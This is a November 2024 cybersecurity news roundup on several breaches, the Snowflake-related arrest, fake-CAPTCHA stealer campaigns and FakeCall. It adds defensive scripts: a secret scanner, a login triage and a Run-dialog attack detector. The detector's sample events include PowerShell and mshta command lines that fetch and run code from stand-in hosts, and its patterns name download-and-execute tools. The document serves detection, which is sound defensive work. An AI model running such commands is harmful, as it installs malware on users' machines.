The Rundown Nov 5

11-05-2024
David S. Harris
Nokia Breach
Italian Data Breach
French ISP Data Breach
Internet Archive Breach
Fake CAPTCHA Infostealer
FakeCall Malware

Nokia's Internal Data Offered for $20,000 Following Breach via Contractor

A threat actor claims to have obtained Nokia's internal data by breaching a third-party contractor and is offering it for sale on BreachForums for $20,000. According to the listing, the haul consists of SSH keys, source code and internal credentials; no customer data is said to be affected.

According to the threat actor's post, the compromised data includes SSH keys, source code, RSA keys, Bitbucket logins, SMTP accounts, webhooks and hardcoded credentials. Material of this kind matters more than its volume suggests: a single valid SSH or Bitbucket credential is a foothold into build and deployment infrastructure, and secrets hardcoded in source stay valid long after the repository itself has been copied. To substantiate the claim, the attacker shared a file tree showing files and folders linked to Nokia's operations.
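The categories in that listing (private keys, SMTP logins, webhook URLs, passwords in source) are exactly what a repository secret scan is meant to catch before a repository leaves the building. The scanner below is an added example written for this page; it is not Nokia's tooling or anything from the attacker's post. The regex rules are illustrative assumptions, not a complete ruleset, and the sample tree it scans is constructed with fake values.

```python
"""Secret scanner for the artefact types named in the Nokia listing: private key
blocks, hardcoded passwords, SMTP credentials embedded in URLs, chat webhook
URLs and basic-auth URLs. This is an added example, not Nokia's tooling or the
attacker's; the rules and the sample tree are constructed for illustration."""
import os
import re
import tempfile
from dataclasses import dataclass

# Illustrative rules, not a complete ruleset: extend with your providers' token formats.
RULES = [
    ("private_key", re.compile(r"-----BEGIN (?:RSA |OPENSSH |EC |DSA )?PRIVATE KEY-----")),
    ("hardcoded_password", re.compile(r"(?i)(?:password|passwd|pwd)\s*[=:]\s*['\"]([^'\"\s]{6,})['\"]")),
    ("smtp_credentials_url", re.compile(r"smtps?://[^\s:/@]+:[^\s@]+@[^\s/]+")),
    ("webhook_url", re.compile(r"https://hooks\.slack\.com/services/[A-Za-z0-9/]+")),
    ("basic_auth_url", re.compile(r"https?://[^\s:/@]+:[^\s@]+@[^\s/]+")),
]
SKIP_DIRS = {".git", "node_modules", ".venv"}


@dataclass(frozen=True)
class Finding:
    path: str
    line_no: int
    rule: str
    excerpt: str  # redacted, so the report itself never reproduces the secret


def redact(text: str) -> str:
    """Keep just enough of the match to locate it in the file."""
    return text[:8] + "..." + text[-4:] if len(text) > 16 else text[:4] + "..."


def scan_file(path: str) -> list:
    findings = []
    try:
        with open(path, "r", encoding="utf-8") as fh:  # strict decoding: binaries raise and are skipped
            for line_no, line in enumerate(fh, 1):
                for name, rx in RULES:
                    for m in rx.finditer(line):
                        findings.append(Finding(path, line_no, name, redact(m.group(0))))
    except (UnicodeDecodeError, OSError):
        pass
    return findings


def scan_tree(root: str) -> list:
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d not in SKIP_DIRS]  # prune in place
        for fn in sorted(filenames):
            findings.extend(scan_file(os.path.join(dirpath, fn)))
    return findings


# Constructed sample tree mimicking the categories in the listing (all values are fake).
SAMPLE_TREE = {
    "config/mail.env": "SMTP_URL=smtp://relay-user:Sup3rS3cret@mail.example.internal:587\n",
    "deploy/notify.sh": 'curl -X POST https://hooks.slack.com/services/T000/B000/XXXXXXXX -d "$MSG"\n',
    "keys/id_rsa": "-----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXktdjEAAAAA\n-----END OPENSSH PRIVATE KEY-----\n",
    "src/db.py": 'DB_PASSWORD = "hunter2hunter2"  # TODO: move to the vault\n',
    "README.md": "Use the vault; never commit credentials.\n",
}


def demo() -> list:
    """Write the sample tree to a temp dir, scan it, return (relative path, rule) pairs."""
    with tempfile.TemporaryDirectory() as root:
        for rel, content in SAMPLE_TREE.items():
            full = os.path.join(root, rel)
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "w", encoding="utf-8") as fh:
                fh.write(content)
        return sorted((os.path.relpath(f.path, root), f.rule) for f in scan_tree(root))


if __name__ == "__main__":
    for path, rule in demo():
        print(f"{rule:22} {path}")
```

Run it as a pre-commit hook or in CI against the full history, not just the working tree: a key that was committed and later deleted is still in every clone. Findings are redacted on purpose, since a scanner report that quotes secrets verbatim just creates another copy of them.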

The data was reportedly accessed through a contractor working with Nokia, a route that is increasingly common as companies grant contractors broad access to their systems. Experts have long warned about this risk and urge companies to hold third-party partners to the same security standards as internal staff.

Even without customer data, access to Nokia's internal environment carries significant risk: stolen keys and credentials could allow attackers to alter Nokia's services or software, or to pivot from them into other systems.

Nokia is reportedly aware of the claims and is investigating, stating, "To date, our investigation has found no evidence that any of our systems or data are impacted."

The threat actor, Intel Broker, is a prominent figure on BreachForums with a record of high-profile claims, including earlier purported breaches of Apple and AMD that exposed internal tools and employee information.

Data Breach at Texas-Based Insurance Service Provider Affects 800,000 Individuals

A significant data breach at Landmark Admin, a Texas insurance administrative services provider, may impact over 800,000 individuals nationwide, including nearly 68,000 Texans, according to recent filings. The breach, which occurred on May 13, 2024, potentially exposed a range of sensitive data, including names, addresses, Social Security numbers, ID numbers, financial information such as credit or debit card numbers, and medical and health insurance details. Both the Texas and Maine Attorneys General were notified of the incident, and Landmark informed affected consumers on October 23.

Upon discovering the breach, Landmark disconnected the compromised systems and revoked remote access to its network. The company then engaged a third-party cybersecurity firm to secure its systems and conduct a forensic investigation into the nature and scope of the incident. Despite that containment, the unauthorized actor regained access to Landmark's environment on June 17, 2024, while the investigation was still underway, a sign that the initial response had not removed every foothold. The investigation was completed on or about July 24, 2024.

Landmark Admin, a third-party administrator for insurance carriers including Dallas-based Liberty Bankers Insurance Group, is offering impacted individuals credit monitoring and identity theft protection services, along with a $1 million insurance reimbursement policy and identity theft recovery services. Landmark also noted that the compromised personal information includes details of individuals connected to insurance policies administered by the company, such as policyholders, beneficiaries, or payors.

Italian Politicians Sound Alarm Following Breach Impacting 800,000 Citizens

Italian politicians have voiced alarm after revelations of a significant data breach potentially affecting the sensitive information of 800,000 citizens. Prosecutors in Milan disclosed that a private investigative agency had been compiling dossiers on high-profile Italian business and political figures using unauthorized access to law-enforcement, tax-authority and other sensitive public databases. The intrusions reportedly date back to 2022, though authorities are still determining which individuals and officials were specifically targeted.

Italian Foreign Minister Antonio Tajani condemned the breach, calling it "a threat to democracy," while the opposition Democratic Party demanded that Premier Giorgia Meloni address parliament on measures to protect citizens' data. Four individuals are currently under house arrest, including Carmine Gallo, a former law enforcement official believed to head the investigative agency responsible, and the alleged lead hacker. Twenty other individuals, including prominent business figures, are under investigation in the case, which was announced last Saturday.

French ISP Free Discloses Cyberattack Impacting 19 Million Accounts

French telecommunications provider Free, the nation's second-largest Internet service provider, has confirmed a cyberattack that exposed data on more than 19 million subscribers. The threat actor, using the handle "drussellx," advertised two databases stolen from the ISP on a cybercrime forum, claiming they contained information on over 19 million customer accounts, including more than 5 million international bank account numbers (IBANs).

Free disclosed the breach to Agence France-Presse on October 26, reporting that "unauthorized access" had been gained to some personal data associated with certain subscriber accounts. Free emphasized that no passwords, bank-card information, emails, SMS messages or voicemails were compromised, and that customer services remained unaffected. As part of its response, Free is notifying affected customers, has filed a criminal complaint with French authorities, and has reported the incident to the data protection regulator (CNIL) and the national cybersecurity agency (ANSSI).

Internet Archive Hack Exposes 31 Million Users’ Information

The Internet Archive, a nonprofit dedicated to providing universal access to knowledge, suffered a major breach exposing the information of over 31 million users. The attack prompted a temporary shutdown of services, and the organization confirmed that identifying information, including email addresses, screen names and bcrypt-hashed passwords, had been compromised. The nonprofit, which operates with limited resources, assured users that its digital library and archive collections remain intact.

News of the attack surfaced on October 9, when users shared screenshots showing that JavaScript on the website had been tampered with to display a pop-up announcing the breach. This follows an earlier attack in May, which the organization described as its first since its founding in 1996.

Royal Canadian Mounted Police Arrest Threat Actor Linked to Ticketmaster and AT&T Breaches

The Royal Canadian Mounted Police recently arrested Alexander Connor Moucka, known online as Judische and Waifu, in connection with the wave of breaches of customer accounts on the cloud data platform Snowflake, including those affecting Ticketmaster and AT&T. Moucka is suspected of compromising over 100 such accounts using credentials harvested by infostealer malware and is alleged to have stolen data from major Snowflake customers; the Ticketmaster theft alone reportedly covered more than 500 million individuals.

Snowflake's own platform was not breached. The intrusions worked because many customer accounts had no multi-factor authentication and no network policy restricting source IPs, so a single leaked password, some dating back years, was enough to log in. Mandiant, a cybersecurity firm, attributed the campaign to the financially motivated threat actor UNC5537.
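The practical follow-up for any Snowflake tenant is to find accounts that are still logging in with a password and nothing else, and to rank the ones doing so from outside the corporate network. The script below is an added example written for this page, not code from Snowflake, Mandiant or the investigators; its rows are modelled on the columns of the SNOWFLAKE.ACCOUNT_USAGE.LOGIN_HISTORY view, but the rows themselves and the corporate IP range are constructed.

```python
"""Hunt for password-only logins in a Snowflake-style login history: the gap the
2024 Snowflake customer intrusions exploited. Added example, not Snowflake's or
Mandiant's code. Rows are modelled on the columns of
SNOWFLAKE.ACCOUNT_USAGE.LOGIN_HISTORY; the rows themselves and the corporate
IP range are constructed."""
from collections import defaultdict
from ipaddress import ip_address, ip_network

# Assumption: your organisation's egress range; anything else is "off-network".
CORPORATE_NETS = [ip_network("203.0.113.0/24")]

# Constructed rows: (event_ts, user, client_ip, client_type, first_factor, second_factor, success)
SAMPLE_LOGIN_HISTORY = [
    ("2024-05-01T08:02:11Z", "ALICE",   "203.0.113.10",  "SNOWFLAKE_UI",  "PASSWORD",    "DUO_PUSH", True),
    ("2024-05-01T09:15:40Z", "SVC_ETL", "203.0.113.22",  "PYTHON_DRIVER", "RSA_KEYPAIR", None,       True),
    ("2024-05-02T03:44:09Z", "BOB",     "198.51.100.77", "OTHER",         "PASSWORD",    None,       True),
    ("2024-05-02T03:44:31Z", "BOB",     "198.51.100.77", "OTHER",         "PASSWORD",    None,       True),
    ("2024-05-03T12:00:00Z", "CAROL",   "203.0.113.15",  "SNOWFLAKE_UI",  "PASSWORD",    None,       True),
    ("2024-05-03T12:01:00Z", "MALLORY", "198.51.100.9",  "OTHER",         "PASSWORD",    None,       False),
]


def is_corporate(ip: str) -> bool:
    addr = ip_address(ip)
    return any(addr in net for net in CORPORATE_NETS)


def password_only_logins(rows):
    """Successful logins that relied on a password alone. Key-pair, OAuth and
    MFA-backed logins are not flagged; failed attempts are left to brute-force hunts."""
    return [r for r in rows if r[6] and r[4] == "PASSWORD" and r[5] is None]


def triage(rows):
    """Per user: count of password-only logins, off-network source IPs, client types.
    Users seen off-network come first: they need a credential reset and MFA now;
    the rest need MFA enforced before the next infostealer log is sold."""
    per_user = defaultdict(lambda: {"count": 0, "off_network_ips": set(), "clients": set()})
    for _ts, user, ip, client, _first, _second, _ok in password_only_logins(rows):
        entry = per_user[user]
        entry["count"] += 1
        entry["clients"].add(client)
        if not is_corporate(ip):
            entry["off_network_ips"].add(ip)
    ranked = sorted(per_user.items(), key=lambda kv: (-len(kv[1]["off_network_ips"]), kv[0]))
    return [(user, d["count"], sorted(d["off_network_ips"]), sorted(d["clients"]))
            for user, d in ranked]


if __name__ == "__main__":
    for user, count, off_net, clients in triage(SAMPLE_LOGIN_HISTORY):
        action = "RESET+MFA" if off_net else "ENFORCE MFA"
        print(f"{user:8} {count:3} password-only logins  off-network={off_net or '-'}  clients={clients}  -> {action}")
```

Against a live tenant the same filter is a query on the real view (IS_SUCCESS, FIRST_AUTHENTICATION_FACTOR and SECOND_AUTHENTICATION_FACTOR), and the "OTHER" client type is worth a second look on its own: the intrusions were driven from custom tooling, not the web UI. Note that finding zero password-only logins says nothing about whether MFA is enforced; that is a separate check on the account's authentication policy.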

Malware Campaign Utilizes Fake CAPTCHAs to Spread Infection

A recent malware campaign has been observed using fake CAPTCHA verifications to deceive users and install malware. The attackers rely on users’ instinct to quickly bypass CAPTCHA tests, particularly on websites hosting online ads, adult content, file-sharing services, betting platforms, and anime sites.

The primary payload is the Lumma stealer, with Amadey also observed. Victims are redirected, typically by malicious ads, to a page imitating a genuine CAPTCHA check. Clicking "I'm not a robot" silently copies a PowerShell command to the clipboard, and the page then instructs the user to open the Windows Run dialog and paste it. That command downloads and launches the stealer, which searches for cryptocurrency wallets and extracts saved credentials and other data from browsers. Nothing is exploited in the browser; the user runs the malware themselves.

While Lumma has been used in similar campaigns before, Amadey is a new addition. It can steal data from popular browsers, detect and replace cryptocurrency wallet addresses on the clipboard, and install the Remcos remote access tool, giving attackers full control over infected systems.
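Because the fake-CAPTCHA chain has the victim paste a command into the Run dialog, its first malicious process is a child of explorer.exe with a command line no human would type by hand. The detector below is an added example for this page, not code from any vendor report; the process-creation events it scores are constructed in a Sysmon Event ID 1-like shape, and the indicator weights are assumptions to be tuned against your own baseline.

```python
"""Detect the Win+R / paste chain that fake-CAPTCHA pages rely on: the page copies
a command to the clipboard and tells the victim to paste it into the Run dialog, so
the first malicious process is a child of explorer.exe. Added example, not from any
vendor report; the events below are constructed in a Sysmon Event ID 1-like shape."""
import re
from collections import namedtuple

Event = namedtuple("Event", "utc parent_image image command_line")

# Constructed sample: explorer.exe -> powershell.exe is what the Run dialog produces.
SAMPLE_EVENTS = [
    Event("2024-10-20T14:01:02Z", r"C:\Windows\explorer.exe",
          r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          'powershell -w hidden -ep bypass -c "iwr https://captcha-verify.example/v.txt | iex"'),
    Event("2024-10-20T14:05:10Z", r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
          "mshta https://robot-check.example/verify.hta"),
    Event("2024-10-20T14:07:44Z", r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe",
          "notepad.exe notes.txt"),
    Event("2024-10-20T14:09:00Z", r"C:\Program Files\Microsoft VS Code\Code.exe",
          r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell.exe -NoLogo"),
    Event("2024-10-20T14:12:30Z", r"C:\Windows\explorer.exe",
          r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          "powershell.exe -NoExit -Command Get-Date"),
]

LOLBINS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
           "wscript.exe", "cscript.exe", "curl.exe", "certutil.exe"}

# (regex, weight, name): weighted by how unlikely a person is to type it into Run.
INDICATORS = [
    (r"(?i)-w(?:indowstyle)?\s+h(?:idden)?", 2, "hidden_window"),
    (r"(?i)-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", 3, "encoded_command"),
    (r"(?i)\b(?:iwr|invoke-webrequest|invoke-restmethod|downloadstring|curl|certutil)\b", 2, "remote_fetch"),
    (r"(?i)\b(?:iex|invoke-expression)\b", 2, "eval"),
    (r"(?i)-e(?:xecutionpolicy|p)\s+bypass", 1, "ep_bypass"),
    (r"(?i)\bmshta\b.*https?://", 3, "mshta_remote"),
]


def score(cmd: str):
    """Return (total weight, names of indicators present) for one command line."""
    hits = [name for rx, _w, name in INDICATORS if re.search(rx, cmd)]
    total = sum(w for _rx, w, name in INDICATORS if name in hits)
    return total, hits


def detect_clickfix(events, threshold=3):
    """Alert on explorer.exe spawning a LOLBin with a command line scoring >= threshold."""
    alerts = []
    for ev in events:
        if ev.parent_image.lower().rsplit("\\", 1)[-1] != "explorer.exe":
            continue  # Run-dialog launches are children of explorer.exe
        if ev.image.lower().rsplit("\\", 1)[-1] not in LOLBINS:
            continue
        total, hits = score(ev.command_line)
        if total >= threshold:
            alerts.append((ev.utc, ev.image.rsplit("\\", 1)[-1], total, hits))
    return alerts


if __name__ == "__main__":
    for utc, image, total, hits in detect_clickfix(SAMPLE_EVENTS):
        print(f"{utc} {image:16} score={total} {','.join(hits)}")
```

The parent-process filter is what keeps this quiet: an IDE or a scheduled task spawning PowerShell is normal, explorer.exe doing so with a hidden window and a remote download is not. For corroboration on a suspect host, the pasted command is usually also recorded under the user's RunMRU key (HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU), which survives after the process has exited.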

FakeCall Malware Enhances Capabilities to Intercept Calls to Banks

A new version of FakeCall, an Android financial fraud Trojan, has emerged with enhanced features for intercepting customer-support calls to banks. First documented in 2022, this malware goes beyond typical banking Trojans by rerouting calls intended for bank support lines to numbers controlled by the attackers.

FakeCall's ability to simulate incoming calls from bank representatives gives victims a false sense of security and persuades them to share sensitive information. The malware gains this capability when the user is tricked into setting it as the default call handler (the Android dialer role), after which it can intercept outgoing calls, redirect them, and draw its own screen over the legitimate in-call UI so the victim still sees the bank's real number.

The Trojan also abuses Android's Accessibility Service, which lets it read what is displayed on the screen and interact with the interface on the user's behalf. Its code is obfuscated, which hampers static analysis and makes the malicious behaviour hard to spot for both security tools and users.
